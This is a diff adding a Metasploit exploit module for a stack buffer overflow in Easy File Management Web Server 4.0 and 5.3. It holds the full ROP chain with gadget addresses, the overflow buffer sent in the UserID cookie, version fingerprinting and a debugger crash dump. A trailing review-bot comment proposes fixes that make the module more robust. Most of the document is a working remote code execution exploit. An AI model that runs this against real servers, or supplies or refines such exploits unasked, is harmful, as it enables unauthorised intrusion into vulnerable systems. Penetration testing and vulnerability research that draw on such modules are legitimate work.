| 1 | +## |
| 2 | +# This module requires Metasploit: http//metasploit.com/download |
| 3 | +# Current source: https://github.com/rapid7/metasploit-framework |
| 4 | +## |
| 5 | + |
| 6 | +require 'msf/core' |
| 7 | + |
| 8 | +class Metasploit3 < Msf::Exploit::Remote |
| 9 | + Rank = NormalRanking # Reliable memory corruption |
| 10 | + |
| 11 | + include Msf::Exploit::Remote::HttpClient |
| 12 | + |
| 13 | + def initialize(info = {}) |
| 14 | + super(update_info(info, |
| 15 | + 'Name' => 'Easy File Management Web Server Stack Buffer Overflow', |
| 16 | + 'Description' => %q{ |
| 17 | + Easy File Management Web Server v4.0 and v5.3 contains a stack buffer |
| 18 | + overflow condition that is triggered as user-supplied input is not |
| 19 | + properly validated when handling the UserID cookie. This may allow a |
| 20 | + remote attacker to execute arbitrary code. |
| 21 | + }, |
| 22 | + 'Author' => |
| 23 | + [ |
| 24 | + 'superkojiman', # Vulnerability discovery |
| 25 | + 'Julien Ahrens', # Exploit |
| 26 | + 'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit module |
| 27 | + ], |
| 28 | + 'License' => MSF_LICENSE, |
| 29 | + 'References' => |
| 30 | + [ |
| 31 | + ['OSVDB', '107241'], |
| 32 | + ['EDB', '33610'], |
| 33 | + ['BID', '67542'], |
| 34 | + ['URL', 'http://www.cnnvd.org.cn/vulnerability/show/cv_id/2014050536'], |
| 35 | + ['URL', 'http://www.web-file-management.com/'] |
| 36 | + ], |
| 37 | + 'Platform' => 'win', |
| 38 | + 'Arch' => ARCH_X86, |
| 39 | + 'DefaultOptions' => |
| 40 | + { |
| 41 | + 'EXITFUNC' => 'process' |
| 42 | + }, |
| 43 | + 'Payload' => |
| 44 | + { |
| 45 | + 'BadChars' => "\x00\x0a\x0d;", |
| 46 | + 'Space' => 3420 # Lets play it safe |
| 47 | + }, |
| 48 | + 'Targets' => |
| 49 | + [ |
| 50 | + # Successfully tested efmws.exe (4.0.0.0) / (5.3.0.0) on: |
| 51 | + # -- Microsoft Windows XP [Version 5.1.2600] |
| 52 | + # -- Microsoft Windows [Version 6.1.7600] |
| 53 | + # -- Microsoft Windows [Version 6.3.9600] |
| 54 | + ['Automatic Targeting', { 'auto' => true }], |
| 55 | + ['Efmws 5.3 Universal', { 'Esp' => 0xA445ABCF, 'Ret' => 0x10010101 }], |
| 56 | + ['Efmws 4.0 Universal', { 'Esp' => 0xA4518472, 'Ret' => 0x10010101 }], |
| 57 | + # 0x10010101 = pop ebx > pop ecx > retn |
| 58 | + # 0xA445ABCF = 0x514CF5 push esp > retn 0c |
| 59 | + # 0xA4518472 = 0x457452 jmp esp |
| 60 | + # From ImageLoad.dll |
| 61 | + ], |
| 62 | + 'DisclosureDate' => 'May 20 2014', |
| 63 | + 'DefaultTarget' => 0)) |
| 64 | + |
| 65 | + register_options( |
| 66 | + [ |
| 67 | + OptString.new('TARGETURI', [true, 'The URI path of an existing resource', '/vfolder.ghp']) |
| 68 | + ], self.class) |
| 69 | + end |
| 70 | + |
| 71 | + def get_version |
| 72 | + |
| 73 | + # |
| 74 | + # NOTE: Version 5.3 still reports "4.0" in the "Server" header |
| 75 | + # |
| 76 | + |
| 77 | + version = nil |
| 78 | + res = send_request_raw({'uri' => '/whatsnew.txt'}) |
| 79 | + if res && res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/ |
| 80 | + version = $1 |
| 81 | + vprint_status "#{peer} - Found version: #{version}" |
| 82 | + elsif res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/ |
| 83 | + version = $1 |
| 84 | + vprint_status "#{peer} - Based on Server header: #{version}" |
| 85 | + end |
| 86 | + |
| 87 | + version |
| 88 | + end |
| 89 | + |
| 90 | + def check |
| 91 | + code = Exploit::CheckCode::Safe |
| 92 | + version = get_version |
| 93 | + if version.nil? |
| 94 | + code = Exploit::CheckCode::Unknown |
| 95 | + elsif version == "5.3" |
| 96 | + code = Exploit::CheckCode::Appears |
| 97 | + elsif version == "4.0" |
| 98 | + code = Exploit::CheckCode::Appears |
| 99 | + end |
| 100 | + |
| 101 | + code |
| 102 | + end |
| 103 | + |
| 104 | + def exploit |
| 105 | + |
| 106 | + # |
| 107 | + # Get target version to determine how to reach call/jmp esp |
| 108 | + # |
| 109 | + |
| 110 | + print_status("#{peer} - Fingerprinting version...") |
| 111 | + version = get_version |
| 112 | + |
| 113 | + if target.name =~ /Automatic/ |
| 114 | + if version.nil? |
| 115 | + fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target") |
| 116 | + elsif version =~ /5\.3/ |
| 117 | + my_target = targets[1] |
| 118 | + elsif version =~ /4\.0/ |
| 119 | + my_target = targets[2] |
| 120 | + end |
| 121 | + print_good("#{peer} - Version #{version} found") |
| 122 | + else |
| 123 | + my_target = target |
| 124 | + unless version && my_target.name.include?(version) |
| 125 | + print_error("#{peer} - The selected target doesn't match the detected version, trying anyway...") |
| 126 | + end |
| 127 | + end |
| 128 | + |
| 129 | + # |
| 130 | + # Fu to reach where payload lives |
| 131 | + # |
| 132 | + |
| 133 | + sploit = rand_text(80) # Junk |
| 134 | + sploit << [0x1001D8C8].pack("V") # Push edx |
| 135 | + sploit << rand_text(280) # Junk |
| 136 | + sploit << [my_target.ret].pack("V") # Pop ebx > pop ecx > retn |
| 137 | + sploit << [my_target['Esp']].pack("V") # Setup call/jmp esp |
| 138 | + sploit << [0x10010125].pack("V") # Contains 00000000 to pass the jnz instruction |
| 139 | + sploit << [0x10022AAC].pack("V") # Mov eax,ebx > pop esi > pop ebx > retn |
| 140 | + sploit << rand_text(8) # Filler |
| 141 | + sploit << [0x1001A187].pack("V") # Add eax,5bffc883 > retn |
| 142 | + sploit << [0x1002466D].pack("V") # Push eax > retn |
| 143 | + sploit << payload.encoded |
| 144 | + |
| 145 | + print_status "#{peer} - Trying target #{my_target.name}..." |
| 146 | + |
| 147 | + # |
| 148 | + # NOTE: Successful HTTP request is required to trigger |
| 149 | + # |
| 150 | + |
| 151 | + send_request_cgi({ |
| 152 | + 'uri' => normalize_uri(target_uri.path), |
| 153 | + 'cookie' => "SESSIONID=; UserID=#{sploit}; PassWD=;", |
| 154 | + }, 1) |
| 155 | + end |
| 156 | +end |
| 157 | + |
| 158 | +=begin |
| 159 | +
|
| 160 | +# |
| 161 | +# 0x44f57d This will write UserID up the stack. If the UserID is to large it |
| 162 | +# will overwrite a pointer which is used later on at 0x468702 |
| 163 | +# |
| 164 | +
|
| 165 | +eax=000007d1 ebx=00000000 ecx=000001f4 edx=016198ac esi=01668084 edi=016198ac |
| 166 | +eip=0044f57d esp=016197e8 ebp=ffffffff iopl=0 nv up ei pl nz na po nc |
| 167 | +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 |
| 168 | +fmws+0x4f57d: |
| 169 | +0044f57d f3a5 rep movs dword ptr es:[edi],dword ptr [esi] |
| 170 | +0:004> dd @esi |
| 171 | +01668084 41414141 41414141 41414141 41414141 |
| 172 | +01668094 41414141 41414141 41414141 41414141 |
| 173 | +016680a4 41414141 41414141 41414141 41414141 |
| 174 | +016680b4 41414141 41414141 41414141 41414141 |
| 175 | +016680c4 41414141 41414141 41414141 41414141 |
| 176 | +016680d4 41414141 41414141 41414141 41414141 |
| 177 | +016680e4 41414141 41414141 41414141 41414141 |
| 178 | +016680f4 41414141 41414141 41414141 41414141 |
| 179 | +
|
| 180 | +(c38.8cc): Access violation - code c0000005 (first chance) |
| 181 | +First chance exceptions are reported before any exception handling. |
| 182 | +This exception may be expected and handled. |
| 183 | +eax=00000000 ebx=00000000 ecx=015198fc edx=41414141 esi=015198ec edi=015198fc |
| 184 | +eip=00468702 esp=015197c0 ebp=ffffffff iopl=0 nv up ei pl nz na pe nc |
| 185 | +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 |
| 186 | +fmws+0x68702: |
| 187 | +00468702 ff5228 call dword ptr [edx+28h] ds:0023:41414169=???????? |
| 188 | +
|
| 189 | +=end |
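Review bot: In `get_version`, the `elsif` branch reads `res.headers['server']` without the nil guard the `if` branch has, so when the request to `/whatsnew.txt` fails and `res` is nil the method raises NoMethodError instead of returning nil, and `check` errors out rather than reporting `Exploit::CheckCode::Unknown`. The guard should read `elsif res && res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/`. A similar gap exists in `exploit` under the Automatic target: a detected version that is neither 5.3 nor 4.0 leaves `my_target` unset, and the later `my_target.ret` call fails with NoMethodError; an `else` arm calling `fail_with(Failure::NoTarget, "#{peer} - Unsupported version #{version}")` would make that failure explicit instead. Prefer `Regexp.last_match(1)` over `$1` in both branches of `get_version` for readability.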